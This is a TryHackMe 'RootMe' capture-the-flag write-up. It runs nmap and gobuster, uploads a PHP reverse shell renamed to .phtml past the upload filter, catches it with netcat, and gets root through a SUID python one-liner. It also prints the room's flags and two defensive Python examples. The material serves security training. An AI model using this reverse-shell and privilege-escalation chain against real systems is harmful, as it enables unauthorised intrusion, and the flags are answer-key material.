TryHackMe - RootMe - Writeup

A ctf for beginners, can you root me?

Nmap Scan

root@ip-10-10-155-254:~# nmap -sCV -A 10.10.25.35

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-24 02:58 BST
Nmap scan report for ip-10-10-25-35.eu-west-1.compute.internal (10.10.25.35)
Host is up (0.011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
MAC Address: 02:27:60:5D:6D:79 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   10.91 ms ip-10-10-25-35.eu-west-1.compute.internal (10.10.25.35)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.13 seconds

Directory fuzzing

root@ip-10-10-155-254:~# gobuster dir -u http://10.10.25.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.25.35
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     sh,cgi,css,py,conf,php,txt,html,js
[+] Timeout:        10s
===============================================================
2021/06/24 03:04:01 Starting gobuster
===============================================================
/index.php (Status: 200)
/uploads (Status: 301)
/css (Status: 301)
/js (Status: 301)
/panel (Status: 301)
/server-status (Status: 403)
Progress: 184238 / 220561 (83.53%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/06/24 03:29:09 Finished
===============================================================

Reconnaissance

Question: Scan the machine, how many ports are open?

Answer: 2

Question: What version of Apache is running?

Answer: 2.4.29

Question: What service is running on port 22?

Answer: SSH

Question: Find directories on the web server using the GoBuster tool.

Answer: No answer needed

Question: What is the hidden directory?

Answer: /panel/

Getting a shell

Find a form to upload and get a reverse shell, and find the flag.

Navigate to http://10.10.25.35/panel/, which hosts the upload form. Download the pentestmonkey PHP reverse shell and rename its extension from .php to .phtml so the form accepts it:

root@ip-10-10-155-254:~# wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
--2021-06-24 03:33:27--  https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5491 (5.4K) [text/plain]
Saving to: ‘php-reverse-shell.php’

php-reverse-shell.php      100%[=====================================>]   5.36K  --.-KB/s    in 0s      

2021-06-24 03:33:29 (56.0 MB/s) - ‘php-reverse-shell.php’ saved [5491/5491]
root@ip-10-10-155-254:~# mv php-reverse-shell.php shell.phtml

Edit shell.phtml and set the IP and port to those of your attacking machine. Upload it through the form, then navigate to http://10.10.25.35/uploads/; you’ll see the shell.phtml you uploaded, and opening it triggers the connection back. Make sure netcat is listening on the port you provided in the shell before you do.

root@ip-10-10-155-254:~# nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.25.35 55994 received!
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 02:53:28 up 56 min,  0 users,  load average: 0.00, 0.03, 1.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.4$ ls

bin    dev   initrd.img      lib64	 mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib	     media	 proc  sbin  swap.img  usr  vmlinuz.old
bash-4.4$ 

We got a shell. Now we have to find user.txt. I first looked in /home/* for a user.txt file, but there isn’t any file like that there, so I used the find command to find the flag.

bash-4.4$ find . -name user.txt 2>/dev/null

./var/www/user.txt
bash-4.4$ cat ./var/www/user.txt

THM{y0u_g0t_a_sh3ll}
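As an added example (not the room's or the author's code), here is the kind of extension blocklist the /panel/ form appears to use, beside a hardened allowlist-plus-magic-bytes check; the blocklist rule and the image-only allowlist are assumptions for illustration:

```python
"""Upload validation: a blocklist like the one /panel/ seems to use vs. an allowlist.

Added example, not the room's code. Assumption: the form rejects only the literal
".php" suffix, which is why "shell.phtml" is accepted and still executed as PHP by
Apache's default handler for .ph(p|tml|ar) files.
"""
import os

# Assumed naive filter: rejects only ".php".
BLOCKED_EXTENSIONS = {".php"}

# Hardened rule: only the extensions the feature needs, checked on every dotted
# suffix (so "x.php.jpg" and "x.phtml" both fail), plus an image magic-byte check.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {
    b"\xff\xd8\xff": {".jpg", ".jpeg"},
    b"\x89PNG\r\n\x1a\n": {".png"},
    b"GIF8": {".gif"},
}


def weak_allows(filename: str) -> bool:
    """The bypassable check: looks only at the final suffix and only for .php."""
    return os.path.splitext(filename.lower())[1] not in BLOCKED_EXTENSIONS


def hardened_allows(filename: str, content: bytes) -> bool:
    """Allowlist every suffix in the name and require matching image magic bytes."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or "" in parts:
        return False  # no extension, dotfile (.htaccess), or empty segment "a..jpg"
    if not {"." + p for p in parts[1:]} <= ALLOWED_EXTENSIONS:
        return False
    final = "." + parts[-1]
    return any(content.startswith(magic) and final in exts for magic, exts in MAGIC.items())
```

Serving the upload directory with PHP execution disabled is the second half of the fix, since a validator alone is one regex away from the next bypass.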

Privilege escalation

Now that we have a shell, let’s escalate our privileges to root.

bash-4.4$ find . -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

-rwsr-xr-- 1 root messagebus 42992 Jun 11  2020 ./usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 113528 Jul 10  2020 ./usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 100760 Nov 23  2018 ./usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 10232 Mar 28  2017 ./usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar  4  2019 ./usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Mar 27  2019 ./usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 18448 Jun 28  2019 ./usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 37136 Mar 22  2019 ./usr/bin/newuidmap
-rwsr-xr-x 1 root root 37136 Mar 22  2019 ./usr/bin/newgidmap
-rwsr-xr-x 1 root root 44528 Mar 22  2019 ./usr/bin/chsh
-rwsr-sr-x 1 root root 3665768 Aug  4  2020 ./usr/bin/python
-rwsr-xr-x 1 root root 76496 Mar 22  2019 ./usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Mar 22  2019 ./usr/bin/gpasswd
-rwsr-xr-x 1 root root 149080 Jan 31  2020 ./usr/bin/sudo
-rwsr-xr-x 1 root root 40344 Mar 22  2019 ./usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 ./usr/bin/passwd
-rwsr-xr-x 1 root root 22520 Mar 27  2019 ./usr/bin/pkexec
-rwsr-xr-x 1 root root 40152 Oct 10  2019 ./snap/core/8268/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 ./snap/core/8268/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 ./snap/core/8268/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 ./snap/core/8268/bin/su
-rwsr-xr-x 1 root root 27608 Oct 10  2019 ./snap/core/8268/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 ./snap/core/8268/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 ./snap/core/8268/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 ./snap/core/8268/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 ./snap/core/8268/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 ./snap/core/8268/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Oct 11  2019 ./snap/core/8268/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 ./snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 ./snap/core/8268/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Dec  6  2019 ./snap/core/8268/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 ./snap/core/8268/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Jan 27  2020 ./snap/core/9665/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 ./snap/core/9665/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 ./snap/core/9665/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 ./snap/core/9665/bin/su
-rwsr-xr-x 1 root root 27608 Jan 27  2020 ./snap/core/9665/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 ./snap/core/9665/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 ./snap/core/9665/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 ./snap/core/9665/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 ./snap/core/9665/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 ./snap/core/9665/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 31  2020 ./snap/core/9665/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11  2020 ./snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 May 26  2020 ./snap/core/9665/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 110656 Jul 10  2020 ./snap/core/9665/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Feb 11  2020 ./snap/core/9665/usr/sbin/pppd
-rwsr-xr-x 1 root root 43088 Jan  8  2020 ./bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22  2019 ./bin/su
-rwsr-xr-x 1 root root 30800 Aug 11  2016 ./bin/fusermount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 ./bin/ping
-rwsr-xr-x 1 root root 26696 Jan  8  2020 ./bin/umount

I saw python; it’s kinda weird to see it with SUID permission.
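An added example, not part of the room: a small auditor that parses ls -ldb lines like those above and flags setuid-root interpreters and anything outside an assumed baseline of stock setuid helpers (both name sets are illustrative assumptions, not authoritative lists):

```python
"""Audit a 'find / -perm -4000' listing for setuid-root oddities.

Added example, not part of the room. Parses 'ls -ldb' style lines and flags
(a) interpreters or shells that are setuid root and (b) setuid-root binaries
outside an assumed baseline of package-provided helpers (both sets assumed).
"""
import re
from typing import List, NamedTuple

LS_LINE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<path>\S+)$"
)
# A setuid-root copy of any of these hands a root shell to whoever can run it.
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "php", "node", "bash", "sh"}
# Assumed baseline of setuid helpers a stock Ubuntu 18.04 box ships (illustrative).
BASELINE = {
    "sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount", "umount",
    "ping", "ping6", "pkexec", "fusermount", "ssh-keysign", "newuidmap", "newgidmap",
    "polkit-agent-helper-1", "dbus-daemon-launch-helper", "snap-confine",
    "lxc-user-nic", "dmcrypt-get-device", "traceroute6.iputils", "pppd",
}


class Finding(NamedTuple):
    path: str
    reason: str


def audit_suid(listing: str) -> List[Finding]:
    """Return one Finding per suspicious setuid-root entry, in listing order."""
    findings = []
    for line in listing.splitlines():
        m = LS_LINE.match(line.strip())
        # Skip unparsable lines, non-root owners, and entries without the setuid bit.
        if not m or m["owner"] != "root" or m["mode"][3] not in "sS":
            continue
        path = m["path"]
        name = path.rsplit("/", 1)[-1]
        if name in INTERPRETERS:
            findings.append(Finding(path, "setuid-root interpreter"))
        elif name not in BASELINE:
            findings.append(Finding(path, "not in setuid baseline"))
    return findings


# Constructed sample: four lines copied from the listing above.
SAMPLE = """\
-rwsr-xr-x 1 root root 149080 Jan 31  2020 ./usr/bin/sudo
-rwsr-sr-x 1 root root 3665768 Aug  4  2020 ./usr/bin/python
-rwsr-xr-- 1 root messagebus 42992 Jun 11  2020 ./usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 44664 Mar 22  2019 ./bin/su
"""
```

Run as a cron job against a saved baseline, a new "setuid-root interpreter" finding is exactly the signal that would have caught this box's misconfiguration.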

Question: Search for files with SUID permission, which file is weird?

Answer: /usr/bin/python

Question: Find a form to escalate your privileges.

Answer: No answer needed

Navigate to the GTFOBins entry for python and use the second command listed there to get root. The -p flag asks the shell to keep the effective UID it inherited from the setuid binary instead of resetting it to the real UID.

bash-4.4$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

whoami
root
cd /root
ls
root.txt
cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}

Question: root.txt

Answer: THM{pr1v1l3g3_3sc4l4t10n}

Room link: RootMe

Written on June 24, 2021